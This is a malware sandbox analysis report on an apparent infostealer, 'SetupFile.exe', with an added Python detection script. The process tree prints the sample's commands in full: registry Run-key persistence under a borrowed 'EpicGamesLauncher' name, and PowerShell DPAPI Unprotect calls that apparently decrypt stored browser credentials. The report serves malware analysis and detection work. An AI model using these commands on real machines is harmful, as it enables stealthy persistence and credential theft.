Analysis

  • max time kernel
    153s
  • max time network
    166s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    02/03/2024, 21:28

General

  • Target

    SetupFile.exe

  • Size

    154.6MB

  • MD5

    101e173a0df61c3e89ec56e49104df9a

  • SHA1

    1ccfb7a85944bd7e84eed587af52b3b03b756575

  • SHA256

    21f5c39e0d4295dceb68bfa9a58e976f36d89e095a9d6eda4cb0d2e1640782a5

  • SHA512

    134f03e73020c2877c9d526351a344f0a2b80df1f5b0cbffec3afcac7954dc0c00ac2e7bffeff0434f637234721ed169aa263edb04ac5fb93bb2c507c4e12708

  • SSDEEP

    1572864:zCquurbtqKajQe7vqrTU4PrCsdCXrBngPE1cG7VOWe2IkBmUgq3Fd6iU3x6VCdbm:TDAgZi

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs
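The signatures above are the sandbox vendor's labels; the process tree below is what an analyst actually has to turn into detection logic. The following is an added example (not part of this report, and not the sandbox's own rules) that replays the tree as constructed process-creation events and applies four rules to them: `tasklist` discovery, `reg add`/`reg delete` on the HKCU Run key (including the delete-then-add "refresh" pattern seen here), an inline `ProtectedData::Unprotect` call in PowerShell, and Chromium-style `--type=...` child processes spawned from an executable under `%TEMP%`. The `cmd.exe /d /s /c "<command>"` wrapper is unwrapped first because that is the exact form Node's `child_process.exec` uses on Windows; together with the Chromium child flags and the dropped `*.tmp.node` file in Downloads, that is consistent with an Electron-packaged sample, which is an inference and not something the report states. The event tuples and the shortened command lines are constructed for the example; the technique IDs are MITRE ATT&CK Enterprise mappings chosen here, not the report's.

```python
import re

# Constructed process events transcribed from the process tree in this report:
# (pid, ppid, image, command_line). Long command lines are shortened and the
# inline DPAPI byte arrays are cut after the first bytes ("..."), because the
# rules below key on the call itself, not on the blob contents.
TEMP_EXE = r"C:\Users\Admin\AppData\Local\Temp\SetupFile.exe"
USER_DATA = r"C:\Users\Admin\AppData\Roaming\SetupFile"
CMD = r"C:\Windows\system32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
REG = r"C:\Windows\system32\reg.exe"
TASKLIST = r"C:\Windows\system32\tasklist.exe"
RUN_KEY = r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
UNPROTECT = ("powershell.exe Add-Type -AssemblyName System.Security; "
             "[System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@("
             "1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,...), $null, 'CurrentUser')")
REG_DEL = f'reg delete "{RUN_KEY}" /v EpicGamesLauncher /f'
REG_ADD = f'reg add "{RUN_KEY}" /v EpicGamesLauncher /t REG_SZ /d "{TEMP_EXE}" /f'

EVENTS = [
    (5096, 0, TEMP_EXE, f'"{TEMP_EXE}"'),
    (3412, 5096, CMD, f'{CMD} /d /s /c "tasklist"'),
    (1408, 3412, TASKLIST, "tasklist"),
    (2108, 5096, CMD, f'{CMD} /d /s /c "tasklist"'),
    (3872, 2108, TASKLIST, "tasklist"),
    (2220, 5096, CMD, f'{CMD} /d /s /c "{REG_DEL}"'),
    (2472, 2220, REG, REG_DEL),
    (640, 5096, CMD, f'{CMD} /d /s /c "{UNPROTECT}"'),
    (3960, 640, PS, UNPROTECT),
    (2748, 5096, CMD, f'{CMD} /d /s /c "{UNPROTECT}"'),
    (4664, 2748, PS, UNPROTECT),
    (1128, 5096, CMD, f'{CMD} /d /s /c "{REG_ADD}"'),
    (2796, 1128, REG, REG_ADD),
    (2972, 5096, TEMP_EXE, f'"{TEMP_EXE}" --type=gpu-process --user-data-dir="{USER_DATA}" '
                           '--mojo-platform-channel-handle=1716 /prefetch:2'),
    (4608, 5096, TEMP_EXE, f'"{TEMP_EXE}" --type=utility --utility-sub-type=network.mojom.NetworkService '
                           f'--service-sandbox-type=none --user-data-dir="{USER_DATA}" '
                           '--mojo-platform-channel-handle=2120 /prefetch:8'),
]

# Node's child_process.exec on Windows runs every command as: cmd.exe /d /s /c "<command>"
CMD_WRAPPER = re.compile(r'cmd(?:\.exe)?"?\s+/d\s+/s\s+/c\s+"(.*)"\s*$', re.I | re.S)
TASKLIST_RE = re.compile(r'^\s*"?tasklist(?:\.exe)?"?\s*$', re.I)
RUN_KEY_RE = re.compile(
    r'\breg(?:\.exe)?\s+(?P<op>add|delete)\s+"?(?P<key>HK\w+\\[^"]*?\\Run)"?\s+/v\s+(?P<name>\S+)'
    r'(?:\s+/t\s+\S+\s+/d\s+"(?P<data>[^"]+)")?', re.I)
DPAPI_RE = re.compile(r"ProtectedData\]::Unprotect\s*\(\s*\[byte\[\]\]\s*@\(.*?'(?P<scope>CurrentUser|LocalMachine)'",
                      re.I | re.S)
CHROMIUM_CHILD_RE = re.compile(r"--type=(?:gpu-process|utility|renderer)\b.*--mojo-platform-channel-handle=\d+", re.S)


def unwrap_cmd(cmdline: str) -> str:
    """Return the inner command of a cmd.exe /d /s /c "<command>" wrapper, else the line unchanged."""
    m = CMD_WRAPPER.search(cmdline)
    return m.group(1) if m else cmdline


def triage(events):
    """One finding per (process, rule). Wrapper cmd.exe processes are evaluated on
    their unwrapped command and kept: in EDR telemetry the wrapper is often the only
    record that survives when the child is short-lived."""
    findings = []
    for pid, ppid, image, cmdline in events:
        inner = unwrap_cmd(cmdline)
        if TASKLIST_RE.match(inner):
            findings.append({"pid": pid, "rule": "process-discovery", "technique": "T1057", "detail": inner})
        if m := RUN_KEY_RE.search(inner):
            findings.append({"pid": pid, "rule": f"run-key-{m['op'].lower()}", "technique": "T1547.001",
                             "detail": {"value": m["name"], "data": m["data"]}})
        if m := DPAPI_RE.search(inner):
            findings.append({"pid": pid, "rule": "dpapi-unprotect", "technique": "T1555.003",
                             "detail": {"scope": m["scope"]}})
        # Chromium/Electron child-process flags from an image under %TEMP%: context, not an ATT&CK technique.
        if "\\appdata\\local\\temp\\" in image.lower() and CHROMIUM_CHILD_RE.search(cmdline):
            findings.append({"pid": pid, "rule": "chromium-child-from-temp", "technique": None, "detail": image})
    return findings


def by_rule(findings):
    """rule name -> sorted list of PIDs that triggered it."""
    out = {}
    for f in findings:
        out.setdefault(f["rule"], set()).add(f["pid"])
    return {rule: sorted(pids) for rule, pids in out.items()}


def run_key_persistence(findings):
    """Run value name -> target path, flagging a delete-then-add refresh of the same value."""
    deleted = {f["detail"]["value"].lower() for f in findings if f["rule"] == "run-key-delete"}
    out = {}
    for f in findings:
        if f["rule"] == "run-key-add":
            v = f["detail"]["value"]
            out[v] = {"data": f["detail"]["data"], "refreshed": v.lower() in deleted}
    return out


if __name__ == "__main__":
    hits = triage(EVENTS)
    for rule, pids in by_rule(hits).items():
        print(f"{rule:26s} {pids}")
    print(run_key_persistence(hits))
```

The Run-key refresh (delete, then add the same value pointing at the sample in `%TEMP%`) is worth a rule of its own: a benign installer registers its value once, and the value name here (`EpicGamesLauncher`) is borrowed from a legitimate product while the data points at `AppData\Local\Temp`.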

Processes

  • C:\Users\Admin\AppData\Local\Temp\SetupFile.exe
    "C:\Users\Admin\AppData\Local\Temp\SetupFile.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:5096
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3412
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:1408
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2108
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:3872
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v EpicGamesLauncher /f"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2220
      • C:\Windows\system32\reg.exe
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v EpicGamesLauncher /f
        3⤵
        PID:2472
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,39,157,190,44,185,213,196,73,159,101,157,196,251,40,97,204,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,207,176,84,217,60,156,184,59,3,27,231,184,96,180,176,22,190,214,124,225,126,33,24,28,196,26,70,57,195,110,188,82,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,30,83,80,130,223,215,209,200,154,200,135,30,7,211,45,117,47,236,133,54,162,197,248,48,15,191,4,221,82,229,239,73,48,0,0,0,242,255,149,87,119,78,203,254,44,206,112,166,170,56,159,42,141,204,250,131,129,122,112,139,143,245,150,254,135,4,213,203,225,73,250,206,251,122,33,94,166,36,90,11,101,93,151,175,64,0,0,0,160,247,120,235,5,145,28,214,21,43,57,158,137,156,192,137,204,32,47,26,118,70,86,248,246,160,26,236,190,176,49,87,14,250,197,37,89,219,92,10,168,37,162,180,48,244,74,4,145,119,28,38,226,69,36,114,141,14,108,246,190,243,105,236), $null, 'CurrentUser')"
      2⤵
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:640
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,39,157,190,44,185,213,196,73,159,101,157,196,251,40,97,204,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,207,176,84,217,60,156,184,59,3,27,231,184,96,180,176,22,190,214,124,225,126,33,24,28,196,26,70,57,195,110,188,82,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,30,83,80,130,223,215,209,200,154,200,135,30,7,211,45,117,47,236,133,54,162,197,248,48,15,191,4,221,82,229,239,73,48,0,0,0,242,255,149,87,119,78,203,254,44,206,112,166,170,56,159,42,141,204,250,131,129,122,112,139,143,245,150,254,135,4,213,203,225,73,250,206,251,122,33,94,166,36,90,11,101,93,151,175,64,0,0,0,160,247,120,235,5,145,28,214,21,43,57,158,137,156,192,137,204,32,47,26,118,70,86,248,246,160,26,236,190,176,49,87,14,250,197,37,89,219,92,10,168,37,162,180,48,244,74,4,145,119,28,38,226,69,36,114,141,14,108,246,190,243,105,236), $null, 'CurrentUser')
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3960
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,39,157,190,44,185,213,196,73,159,101,157,196,251,40,97,204,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,65,175,34,250,158,248,47,122,214,12,177,5,236,230,160,214,54,9,146,172,200,64,166,247,115,211,191,65,67,226,141,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,98,178,61,180,99,60,64,189,114,141,41,44,142,240,192,46,164,34,135,204,86,18,252,196,99,31,197,76,32,227,52,191,48,0,0,0,163,242,13,136,184,138,94,89,30,226,191,237,96,45,115,176,235,168,27,29,123,32,152,89,96,235,171,142,225,115,229,222,160,238,79,11,59,253,161,149,56,39,5,178,191,80,16,62,64,0,0,0,170,27,181,16,68,18,53,67,196,152,228,52,101,132,193,39,212,87,252,149,78,100,15,84,48,124,239,144,250,7,17,140,10,229,7,13,35,191,185,220,162,6,217,41,30,90,185,255,149,203,57,70,43,19,17,179,103,72,89,68,171,124,83,118), $null, 'CurrentUser')"
      2⤵
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:2748
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,39,157,190,44,185,213,196,73,159,101,157,196,251,40,97,204,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,65,175,34,250,158,248,47,122,214,12,177,5,236,230,160,214,54,9,146,172,200,64,166,247,115,211,191,65,67,226,141,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,98,178,61,180,99,60,64,189,114,141,41,44,142,240,192,46,164,34,135,204,86,18,252,196,99,31,197,76,32,227,52,191,48,0,0,0,163,242,13,136,184,138,94,89,30,226,191,237,96,45,115,176,235,168,27,29,123,32,152,89,96,235,171,142,225,115,229,222,160,238,79,11,59,253,161,149,56,39,5,178,191,80,16,62,64,0,0,0,170,27,181,16,68,18,53,67,196,152,228,52,101,132,193,39,212,87,252,149,78,100,15,84,48,124,239,144,250,7,17,140,10,229,7,13,35,191,185,220,162,6,217,41,30,90,185,255,149,203,57,70,43,19,17,179,103,72,89,68,171,124,83,118), $null, 'CurrentUser')
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4664
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v EpicGamesLauncher /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\SetupFile.exe" /f"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1128
      • C:\Windows\system32\reg.exe
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v EpicGamesLauncher /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\SetupFile.exe" /f
        3⤵
        • Adds Run key to start application
        PID:2796
    • C:\Users\Admin\AppData\Local\Temp\SetupFile.exe
      "C:\Users\Admin\AppData\Local\Temp\SetupFile.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\SetupFile" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1716 --field-trial-handle=1880,i,14225943549362777755,6286492048928942185,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
      2⤵
      PID:2972
    • C:\Users\Admin\AppData\Local\Temp\SetupFile.exe
      "C:\Users\Admin\AppData\Local\Temp\SetupFile.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\SetupFile" --mojo-platform-channel-handle=2120 --field-trial-handle=1880,i,14225943549362777755,6286492048928942185,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
      2⤵
      PID:4608
    • C:\Users\Admin\AppData\Local\Temp\SetupFile.exe
      "C:\Users\Admin\AppData\Local\Temp\SetupFile.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\SetupFile" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1948 --field-trial-handle=1880,i,14225943549362777755,6286492048928942185,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:4016

        Network

              MITRE ATT&CK Enterprise v15

              Downloads

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                Filesize

                3KB

                MD5

                f48896adf9a23882050cdff97f610a7f

                SHA1

                4c5a610df62834d43f470cae7e851946530e3086

                SHA256

                3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78

                SHA512

                16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                1KB

                MD5

                46d6c89b6a449ce91c1a3691c516e10e

                SHA1

                dedf2c05d83a8fc311e39fa86af575866f9f7ece

                SHA256

                f6841440d2949cf97fb621923a2f931fca567382856cb60fa4c8ce3f9b81e55f

                SHA512

                bd222cc430c28abe832787973ed2a7a07d58d92f34eed1ebfe69fc4cd8ed59443ed93799979fd39d1b76ef6ff247f3ceb12b3c537de09ffba72ebec748f3e1cd

              • C:\Users\Admin\AppData\Local\Temp\46e6211c-8f1b-48ac-9806-c6228030a298.tmp.node

                Filesize

                1.8MB

                MD5

                3072b68e3c226aff39e6782d025f25a8

                SHA1

                cf559196d74fa490ac8ce192db222c9f5c5a006a

                SHA256

                7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01

                SHA512

                61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jfivb5fn.ikj.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • memory/3960-19-0x000001B81C890000-0x000001B81C8E0000-memory.dmp

                Filesize

                320KB

              • memory/3960-15-0x000001B81C2F0000-0x000001B81C312000-memory.dmp

                Filesize

                136KB

              • memory/3960-17-0x000001B802350000-0x000001B802360000-memory.dmp

                Filesize

                64KB

              • memory/3960-23-0x00007FFCE4D30000-0x00007FFCE57F1000-memory.dmp

                Filesize

                10.8MB

              • memory/3960-16-0x00007FFCE4D30000-0x00007FFCE57F1000-memory.dmp

                Filesize

                10.8MB

              • memory/3960-18-0x000001B802350000-0x000001B802360000-memory.dmp

                Filesize

                64KB

              • memory/4016-75-0x0000028C81040000-0x0000028C81041000-memory.dmp

                Filesize

                4KB

              • memory/4016-77-0x0000028C81040000-0x0000028C81041000-memory.dmp

                Filesize

                4KB

              • memory/4016-78-0x0000028C81040000-0x0000028C81041000-memory.dmp

                Filesize

                4KB

              • memory/4016-79-0x0000028C81040000-0x0000028C81041000-memory.dmp

                Filesize

                4KB

              • memory/4016-76-0x0000028C81040000-0x0000028C81041000-memory.dmp

                Filesize

                4KB

              • memory/4016-68-0x0000028C81040000-0x0000028C81041000-memory.dmp

                Filesize

                4KB

              • memory/4016-69-0x0000028C81040000-0x0000028C81041000-memory.dmp

                Filesize

                4KB

              • memory/4016-67-0x0000028C81040000-0x0000028C81041000-memory.dmp

                Filesize

                4KB

              • memory/4016-74-0x0000028C81040000-0x0000028C81041000-memory.dmp

                Filesize

                4KB

              • memory/4016-73-0x0000028C81040000-0x0000028C81041000-memory.dmp

                Filesize

                4KB

              • memory/4664-42-0x00007FFCE4D30000-0x00007FFCE57F1000-memory.dmp

                Filesize

                10.8MB

              • memory/4664-27-0x0000029D59860000-0x0000029D59870000-memory.dmp

                Filesize

                64KB

              • memory/4664-28-0x0000029D59860000-0x0000029D59870000-memory.dmp

                Filesize

                64KB

              • memory/4664-39-0x0000029D59860000-0x0000029D59870000-memory.dmp

                Filesize

                64KB

              • memory/4664-26-0x00007FFCE4D30000-0x00007FFCE57F1000-memory.dmp

                Filesize

                10.8MB